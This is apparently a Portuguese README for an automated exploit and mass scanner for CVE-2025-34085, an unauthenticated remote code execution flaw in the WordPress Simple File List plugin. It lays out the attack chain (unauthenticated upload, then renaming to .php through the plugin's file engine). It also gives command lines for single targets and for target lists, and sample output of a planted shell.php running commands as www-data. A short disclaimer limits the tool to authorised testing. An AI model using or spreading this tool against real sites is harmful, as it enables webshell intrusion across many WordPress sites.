
WordPress Simple File List Exploit de RCE Não Autenticado
Um exploit automatizado e scanner para CVE-2025-34085, uma vulnerabilidade crítica no plugin WordPress Simple File List, permitindo execução remota de código não autenticada através de funcionalidades arbitrárias de upload e renomeação de arquivos.
Upload de Arquivo Não Autenticado
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenomear para Extensão PHP
.php ou similar via:/wp-content/plugins/simple-file-list/ee-file-engine.phpExecutar Payload
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Coloque as URLs alvo em targets.txt (uma por linha) e execute:
python3 CVE-2025-34085.py --cmd "whoami"
| Argumento | Descrição |
|---|---|
-u | URL do alvo (ex.: http://example.com) |
--cmd | Comando a executar no shell remoto (padrão: id) |
--inline | Usar payload inline (sem parâmetro ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Alvos bem-sucedidos são salvos em vuln.txt.
CVE-2025-34085.py — Script principal do exploittargets.txt — (Opcional) Lista de domínios alvovuln.txt — Log de exploits bem-sucedidosAdministradores devem:
Este projeto destina-se apenas a fins educacionais e de testes autorizados. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.
Este projeto está licenciado sob a Licença MIT. 📄 Ver Texto Completo da Licença
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n